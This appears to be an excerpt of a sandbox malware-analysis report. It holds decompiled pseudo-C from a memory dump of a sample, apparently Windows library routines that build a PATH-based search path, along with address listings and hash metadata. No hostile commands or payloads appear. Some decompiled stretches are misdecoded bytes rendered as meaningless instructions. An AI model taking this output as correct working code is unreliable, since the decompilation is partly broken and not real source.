					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0113A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                          0x010fb171
                                          0x010fb171
                                          0x010fb171
                                          0x010fb171
                                          0x010fb171
                                          0x010fb176
                                          0x010fb17b
                                          0x010fb180
                                          0x010fb186
                                          0x010fb18f
                                          0x010fb198
                                          0x010fb1a4
                                          0x010fb1aa
                                          0x01154802
                                          0x01154802
                                          0x01154805
                                          0x0115480c
                                          0x0115480e
                                          0x010fb1d1
                                          0x010fb1d3
                                          0x010fb1de
                                          0x010fb1de
                                          0x01154817
                                          0x0115481e
                                          0x01154820
                                          0x01154822
                                          0x01154822
                                          0x01154824
                                          0x01154824
                                          0x0115482a
                                          0x00000000
                                          0x00000000
                                          0x01154835
                                          0x0115483a
                                          0x0115483d
                                          0x0115483f
                                          0x01154842
                                          0x01154842
                                          0x01154842
                                          0x01154846
                                          0x0115484c
                                          0x0115484e
                                          0x01154851
                                          0x01154851
                                          0x01154853
                                          0x01154854
                                          0x01154854
                                          0x01154858
                                          0x0115485a
                                          0x0115485a
                                          0x0115485d
                                          0x0115485f
                                          0x01154861
                                          0x01154861
                                          0x01154866
                                          0x0115486b
                                          0x0115486e
                                          0x01154871
                                          0x01154876
                                          0x01154876
                                          0x01154878
                                          0x0115487b
                                          0x01154884
                                          0x01154884
                                          0x00000000
                                          0x0115487d
                                          0x0115487d
                                          0x01154882
                                          0x01154889
                                          0x01154889
                                          0x0115488f
                                          0x01154891
                                          0x011548e0
                                          0x011548e2
                                          0x011548e4
                                          0x011548e4
                                          0x011548e7
                                          0x011548e7
                                          0x011548ed
                                          0x011548f4
                                          0x011548f6
                                          0x01154951
                                          0x01154951
                                          0x01154953
                                          0x01154953
                                          0x01154956
                                          0x01154956
                                          0x01154958
                                          0x01154959
                                          0x01154959
                                          0x0115495d
                                          0x0115495d
                                          0x0115495f
                                          0x0115495f
                                          0x01154965
                                          0x01154969
                                          0x011549ba
                                          0x011549ba
                                          0x011549c1
                                          0x011549c5
                                          0x011549cc
                                          0x011549d4
                                          0x011549d7
                                          0x011549da
                                          0x011549e4
                                          0x011549e5
                                          0x011549f3
                                          0x01154a02
                                          0x00000000
                                          0x01154a02
                                          0x01154972
                                          0x01154974
                                          0x00000000
                                          0x00000000
                                          0x01154976
                                          0x01154979
                                          0x01154982
                                          0x01154983
                                          0x01154984
                                          0x0115498b
                                          0x0115498d
                                          0x01154991
                                          0x01154993
                                          0x01154999
                                          0x0115499d
                                          0x011549a2
                                          0x011549a2
                                          0x011549a2
                                          0x01154999
                                          0x011549ac
                                          0x00000000
                                          0x011549b3
                                          0x011548f8
                                          0x011548fe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011548fe
                                          0x01154895
                                          0x0115489c
                                          0x011548ad
                                          0x011548b2
                                          0x011548b5
                                          0x011548b7
                                          0x011548ba
                                          0x011548bc
                                          0x011548c6
                                          0x011548c6
                                          0x011548cb
                                          0x011548d1
                                          0x011548d4
                                          0x011548d8
                                          0x011548d8
                                          0x00000000
                                          0x011548d8
                                          0x011548be
                                          0x011548c0
                                          0x00000000
                                          0x00000000
                                          0x011548c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011548c4
                                          0x00000000
                                          0x01154882
                                          0x0115487b
                                          0x01154904
                                          0x01154906
                                          0x00000000
                                          0x00000000
                                          0x01154908
                                          0x0115490e
                                          0x00000000
                                          0x00000000
                                          0x01154910
                                          0x01154917
                                          0x01154917
                                          0x00000000
                                          0x01154917
                                          0x010fb1ba
                                          0x011547f9
                                          0x011547fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011547fc
                                          0x010fb1c0
                                          0x010fb1c0
                                          0x010fb1c3
                                          0x010fb1cb
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: e05bdb775601b38609bcca839e60ba53deda18cc6424d85df682d75db8d87026
                                          • Instruction ID: 044f07a1d4fa4ba303313fb2e40eafdb8abbcfbbb2d32fa250d3bb32780feb6f
                                          • Opcode Fuzzy Hash: e05bdb775601b38609bcca839e60ba53deda18cc6424d85df682d75db8d87026
                                          • Instruction Fuzzy Hash: 0B51B371D00259CFEF798FA8C8457AEBBB0BF04714F1041ADDD699B682E7704981CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01122581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E01122581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200334, char _a1546912014) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t242;
				signed int _t245;
				signed int _t247;
				intOrPtr _t249;
				signed int _t252;
				signed int _t259;
				signed int _t262;
				signed int _t270;
				intOrPtr _t276;
				signed int _t278;
				signed int _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				void* _t326;
				signed int _t327;
				signed int _t329;
				signed int _t332;
				void* _t333;
				void* _t335;

				_t329 = _t332;
				_t333 = _t332 - 0x4c;
				_v8 =  *0x11ed360 ^ _t329;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x11eb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t276 = 0x48;
				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t316 = 0;
				_v37 = _t305;
				if(_v48 <= 0) {
					L16:
					_t45 = _t276 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L01114620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t276);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t323 + 0x3c)) = _t276;
							_t278 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x11e8478;
								 *_t323 = ((0 | _t305 == 0x011e8478) - 0x00000001 & 0xfffffffb) + 7;
								E0113F3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t333 = _t333 + 0xc;
								_t278 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t270 = E011839F2(_t318);
									_t305 = _v32;
									_t318 = _t270;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t280 = _t323 + _t278 * 4;
								_v56 = _t280;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t237 =  *(_v60 + _t289 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t280 =  *(_v60 + _t289 * 4);
										 *(_t280 + 0x18) = _t318;
										_t241 =  *(_v60 + _t289 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M01122959))) {
												case 0:
													__ax =  *0x11e8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0113F3E0(__edi,  *0x11e848c, __ax & 0x0000ffff);
														__eax =  *0x11e8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0113F3E0(_t318, _v80, _v64);
													_t265 = _v64;
													goto L26;
												case 2:
													 *0x11e8480 & 0x0000ffff = E0113F3E0(__edi,  *0x11e8484,  *0x11e8480 & 0x0000ffff);
													__eax =  *0x11e8480 & 0x0000ffff;
													__eax = ( *0x11e8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0113F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0113F3E0(_t318, _v76, _v36);
														_t265 = _v36;
													}
													L26:
													_t333 = _t333 + 0xc;
													_t318 = _t318 + (_t265 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t267);
													 *((short*)(_t318 - 2)) = _t267;
													goto L28;
												case 6:
													__ebx =  *0x11e575c;
													__eflags = __ebx - 0x11e575c;
													if(__ebx != 0x11e575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0113F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x11e575c;
														} while (__ebx != 0x11e575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x11e8478 & 0x0000ffff = E0113F3E0(__edi,  *0x11e847c,  *0x11e8478 & 0x0000ffff);
													__eax =  *0x11e8478 & 0x0000ffff;
													__eax = ( *0x11e8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011839F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x11e6e58 & 0x0000ffff = E0113F3E0(__edi,  *0x11e6e5c,  *0x11e6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x11e6e58 & 0x0000ffff;
													__eax = ( *0x11e6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t280 = _t280 + 4;
													__eflags = _t280;
													_v56 = _t280;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t316 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M01122935))) {
							case 0:
								__ax =  *0x11e8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E01122E3E(0,  &_v64);
								_t276 = _t276 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x11e8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x11e8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0110EEF0(0x11e79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0110EB70(__ecx, 0x11e79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x11e7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0110EB70(__ecx, 0x11e79a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t329;
										_pop(_t277);
										return E0113B640(_t216, _t277, _v8 ^ _t329, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t272 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t274 = E01122E3E(_t272,  &_v36);
									_t285 = _v36;
									_v76 = _t274;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t276 = _t276 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x11e5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x11e8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x11e8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x11e6e58 & 0x0000ffff;
								__eax = ( *0x11e6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("adc al, [ecx]");
					asm("o16 sub [edx], dl");
					_t242 = _t241 + _t333;
					asm("daa");
					asm("adc al, [ecx]");
					asm("adc al, [es:ecx]");
					_t326 = _t323 + 1;
					 *_t305 =  *_t305 - _t305;
					 *0x1f011226 =  *0x1f011226 + _t242;
					_pop(_t281);
					_push(ss);
					 *((intOrPtr*)(_t242 +  &_a1530200334)) =  *((intOrPtr*)(_t242 +  &_a1530200334)) + _t305;
					_push(ss);
					 *_t305 =  *_t305 + _t242;
					 *_t305 =  *_t305 - _t305;
					 *((intOrPtr*)(_t242 - 0x9feedd8)) =  *((intOrPtr*)(_t242 - 0x9feedd8)) + _t242;
					asm("daa");
					asm("adc al, [ecx]");
					_push(ds);
					 *_t305 =  *_t305 - _t305;
					 *((intOrPtr*)(_t326 + 0x28)) =  *((intOrPtr*)(_t326 + 0x28)) + _t290;
					asm("adc al, [ecx]");
					asm("daa");
					asm("adc al, [ecx]");
					asm("fcomp dword [ebx+0x16]");
					 *((intOrPtr*)(_t242 +  &_a1546912014)) =  *((intOrPtr*)(_t242 +  &_a1546912014)) + _t326;
					_push(ss);
					_t335 = _t333 + _t290;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x11cff00);
					E0114D08C(_t281, _t318, _t326);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t245 = 0xc0000100;
					} else {
						_v8 = 0;
						_t327 = 0xc0000100;
						_v52 = 0xc0000100;
						_t247 = 4;
						while(1) {
							_v40 = _t247;
							__eflags = _t247;
							if(_t247 == 0) {
								break;
							}
							_t295 = _t247 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x10d1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t262 = E0113E5C0(_a8,  *((intOrPtr*)(_t295 + 0x10d1668)), _t282);
									_t335 = _t335 + 0xc;
									__eflags = _t262;
									if(__eflags == 0) {
										_t327 = E011751BE(_t282,  *((intOrPtr*)(_v48 + 0x10d166c)), _a16, _t319, _t327, __eflags, _a20, _a24);
										_v52 = _t327;
										break;
									} else {
										_t247 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t247 = _t247 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t327;
						__eflags = _t327;
						if(_t327 < 0) {
							__eflags = _t327 - 0xc0000100;
							if(_t327 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t327 = 0xc0000100;
										goto L76;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t249 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t249 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L106:
												_t327 = E01122AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t327;
												__eflags = _t327 - 0xc0000100;
												if(_t327 != 0xc0000100) {
													goto L69;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t252 = E01106600( *(_t307 + 0x1c));
												__eflags = _t252;
												if(_t252 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t327 = E01122C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L76:
											_v32 = _t327;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t327 = _a24;
									_t259 = E01122AE4( &_v36, _a8, _t282, _a16, _a20, _t327);
									_v32 = _t259;
									__eflags = _t259 - 0xc0000100;
									if(_t259 == 0xc0000100) {
										_v32 = E01122C50(_v36, _a8, _t282, _a16, _a20, _t327, 1);
									}
									_v8 = _t319;
									E01122ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t245 = _t327;
					}
					L70:
					return E0114D0D1(_t245);
				}
				L108:
			}





















































                                          0x01122584
                                          0x01122586
                                          0x01122590
                                          0x01122596
                                          0x01122597
                                          0x01122598
                                          0x01122599
                                          0x0112259e
                                          0x011225a4
                                          0x011225a9
                                          0x011225ac
                                          0x011225ae
                                          0x011225b1
                                          0x011225b2
                                          0x011225b5
                                          0x011225b8
                                          0x011225bb
                                          0x011225bc
                                          0x011225bf
                                          0x011225c2
                                          0x011225c5
                                          0x011225c6
                                          0x011225cb
                                          0x011225ce
                                          0x011225d8
                                          0x011225dd
                                          0x011225de
                                          0x011225e1
                                          0x011225e3
                                          0x011225e9
                                          0x011226da
                                          0x011226da
                                          0x011226dd
                                          0x011226e2
                                          0x01165b56
                                          0x00000000
                                          0x011226e8
                                          0x011226f9
                                          0x011226fb
                                          0x011226fe
                                          0x01122700
                                          0x01165b60
                                          0x00000000
                                          0x01122706
                                          0x01122706
                                          0x0112270a
                                          0x0112270a
                                          0x0112270d
                                          0x01122713
                                          0x01122716
                                          0x01122718
                                          0x0112271c
                                          0x0112271e
                                          0x01165b6c
                                          0x01165b6f
                                          0x01165b7f
                                          0x01165b89
                                          0x01165b8e
                                          0x01165b93
                                          0x01165b96
                                          0x01165b9c
                                          0x01165ba0
                                          0x01165ba3
                                          0x01165bab
                                          0x01165bb0
                                          0x01165bb3
                                          0x01165bb3
                                          0x01165ba3
                                          0x01122724
                                          0x01122726
                                          0x01122729
                                          0x0112272c
                                          0x0112279d
                                          0x0112279d
                                          0x011227a0
                                          0x011227a2
                                          0x00000000
                                          0x0112272e
                                          0x0112272e
                                          0x01122731
                                          0x01122734
                                          0x01122734
                                          0x01122736
                                          0x01165bc1
                                          0x01165bc1
                                          0x01165bc4
                                          0x00000000
                                          0x01165bca
                                          0x01165bca
                                          0x01165bcd
                                          0x00000000
                                          0x01165bd3
                                          0x00000000
                                          0x01165bd3
                                          0x01165bcd
                                          0x0112273c
                                          0x0112273c
                                          0x01122742
                                          0x01122747
                                          0x0112274a
                                          0x0112274d
                                          0x01122750
                                          0x00000000
                                          0x01122756
                                          0x01122756
                                          0x00000000
                                          0x01122902
                                          0x01122908
                                          0x0112290b
                                          0x00000000
                                          0x01122911
                                          0x0112291c
                                          0x01122921
                                          0x00000000
                                          0x01122921
                                          0x00000000
                                          0x00000000
                                          0x01122880
                                          0x01122887
                                          0x0112288c
                                          0x00000000
                                          0x00000000
                                          0x01122805
                                          0x0112280a
                                          0x01122814
                                          0x01122816
                                          0x00000000
                                          0x00000000
                                          0x0112281e
                                          0x01122821
                                          0x01122823
                                          0x00000000
                                          0x01122829
                                          0x01122829
                                          0x01122831
                                          0x0112283c
                                          0x0112283e
                                          0x00000000
                                          0x0112283e
                                          0x00000000
                                          0x00000000
                                          0x0112284e
                                          0x01122850
                                          0x01122851
                                          0x01122854
                                          0x01122857
                                          0x0112285a
                                          0x0112285c
                                          0x0112285d
                                          0x00000000
                                          0x00000000
                                          0x0112275d
                                          0x01122761
                                          0x00000000
                                          0x01122767
                                          0x0112276e
                                          0x01122773
                                          0x01122773
                                          0x01122776
                                          0x01122778
                                          0x0112277e
                                          0x0112277e
                                          0x01122781
                                          0x01122781
                                          0x01122783
                                          0x01122784
                                          0x00000000
                                          0x00000000
                                          0x01165bd8
                                          0x01165bde
                                          0x01165be4
                                          0x01165be6
                                          0x01165be8
                                          0x01165be9
                                          0x01165bee
                                          0x01165bf8
                                          0x01165bff
                                          0x01165c01
                                          0x01165c04
                                          0x01165c07
                                          0x01165c0b
                                          0x01165c0d
                                          0x01165c0d
                                          0x01165c15
                                          0x01165c18
                                          0x01165c1b
                                          0x01165c1b
                                          0x01165c1e
                                          0x00000000
                                          0x00000000
                                          0x011228c3
                                          0x011228c8
                                          0x011228d2
                                          0x011228d4
                                          0x011228d8
                                          0x011228db
                                          0x01165c26
                                          0x01165c28
                                          0x01165c2d
                                          0x01165c2d
                                          0x00000000
                                          0x00000000
                                          0x01165c34
                                          0x01165c36
                                          0x01165c49
                                          0x01165c4e
                                          0x01165c54
                                          0x01165c5b
                                          0x01165c5d
                                          0x01165c60
                                          0x01122788
                                          0x01122788
                                          0x0112278b
                                          0x0112278e
                                          0x0112278e
                                          0x0112278e
                                          0x01122791
                                          0x00000000
                                          0x00000000
                                          0x01122756
                                          0x01122750
                                          0x00000000
                                          0x01122794
                                          0x01122794
                                          0x01122795
                                          0x01122798
                                          0x01122798
                                          0x00000000
                                          0x01122734
                                          0x0112272c
                                          0x01122700
                                          0x011225ef
                                          0x011225ef
                                          0x011225ef
                                          0x011225f2
                                          0x011225f8
                                          0x00000000
                                          0x00000000
                                          0x011225fe
                                          0x00000000
                                          0x011228e6
                                          0x011228ec
                                          0x011228ef
                                          0x011228f5
                                          0x011228f8
                                          0x011228f8
                                          0x00000000
                                          0x011228f8
                                          0x00000000
                                          0x00000000
                                          0x01122866
                                          0x01122866
                                          0x01122876
                                          0x01122879
                                          0x00000000
                                          0x00000000
                                          0x011227e0
                                          0x011227e7
                                          0x011227e9
                                          0x011227eb
                                          0x01165afd
                                          0x00000000
                                          0x01165afd
                                          0x00000000
                                          0x00000000
                                          0x01122633
                                          0x01122638
                                          0x0112263b
                                          0x0112263c
                                          0x0112263e
                                          0x01122640
                                          0x01122642
                                          0x01122647
                                          0x01122649
                                          0x0112264e
                                          0x01122650
                                          0x01122653
                                          0x01122659
                                          0x011226a2
                                          0x011226a7
                                          0x011226ac
                                          0x011226b2
                                          0x01165b11
                                          0x01165b15
                                          0x01165b17
                                          0x00000000
                                          0x011226b8
                                          0x011226b8
                                          0x011226ba
                                          0x011227a6
                                          0x011227a6
                                          0x011227a9
                                          0x011227ab
                                          0x011227b9
                                          0x011227b9
                                          0x011227be
                                          0x011227c1
                                          0x011227c3
                                          0x011227c5
                                          0x011227c7
                                          0x01165c74
                                          0x01165c79
                                          0x01165c79
                                          0x011227c7
                                          0x00000000
                                          0x011226c0
                                          0x011226c0
                                          0x011226c3
                                          0x011226c6
                                          0x011226c6
                                          0x011226c9
                                          0x011226c9
                                          0x00000000
                                          0x011226c9
                                          0x011226ba
                                          0x0112265b
                                          0x0112265b
                                          0x0112265e
                                          0x01122667
                                          0x0112266d
                                          0x01122677
                                          0x0112267c
                                          0x0112267f
                                          0x01122681
                                          0x01165b49
                                          0x01165b4e
                                          0x011227cd
                                          0x011227d0
                                          0x011227d1
                                          0x011227d2
                                          0x011227d4
                                          0x011227dd
                                          0x01122687
                                          0x01122687
                                          0x0112268a
                                          0x0112268b
                                          0x0112268e
                                          0x0112268f
                                          0x01122691
                                          0x01122696
                                          0x01122698
                                          0x0112269d
                                          0x0112269f
                                          0x00000000
                                          0x0112269f
                                          0x01122681
                                          0x00000000
                                          0x00000000
                                          0x01122846
                                          0x00000000
                                          0x00000000
                                          0x01122605
                                          0x0112260a
                                          0x0112260c
                                          0x01122611
                                          0x01122616
                                          0x01122619
                                          0x01122619
                                          0x0112261e
                                          0x00000000
                                          0x01122624
                                          0x01122627
                                          0x01122627
                                          0x00000000
                                          0x00000000
                                          0x01165b1f
                                          0x00000000
                                          0x00000000
                                          0x01122894
                                          0x0112289b
                                          0x0112289d
                                          0x011228a1
                                          0x01165b2b
                                          0x01165b2e
                                          0x01165b2e
                                          0x011228a7
                                          0x011228a9
                                          0x01165b04
                                          0x01165b09
                                          0x01165b09
                                          0x01165b09
                                          0x00000000
                                          0x00000000
                                          0x01165b35
                                          0x01165b3c
                                          0x011228fb
                                          0x011228fb
                                          0x011226cc
                                          0x011226cc
                                          0x011226d0
                                          0x00000000
                                          0x011226d2
                                          0x011226d2
                                          0x00000000
                                          0x011226d2
                                          0x00000000
                                          0x00000000
                                          0x011225fe
                                          0x0112292d
                                          0x0112292f
                                          0x01122930
                                          0x01122935
                                          0x01122937
                                          0x01122939
                                          0x0112293c
                                          0x0112293e
                                          0x0112293f
                                          0x01122941
                                          0x01122945
                                          0x01122946
                                          0x01122948
                                          0x0112294e
                                          0x0112294f
                                          0x01122950
                                          0x01122957
                                          0x01122958
                                          0x0112295a
                                          0x0112295c
                                          0x01122962
                                          0x01122963
                                          0x01122965
                                          0x01122966
                                          0x01122968
                                          0x0112296b
                                          0x0112296e
                                          0x0112296f
                                          0x01122971
                                          0x01122974
                                          0x0112297b
                                          0x0112297c
                                          0x0112297e
                                          0x0112297f
                                          0x01122980
                                          0x01122981
                                          0x01122982
                                          0x01122983
                                          0x01122984
                                          0x01122985
                                          0x01122986
                                          0x01122987
                                          0x01122988
                                          0x01122989
                                          0x0112298a
                                          0x0112298b
                                          0x0112298c
                                          0x0112298d
                                          0x0112298e
                                          0x0112298f
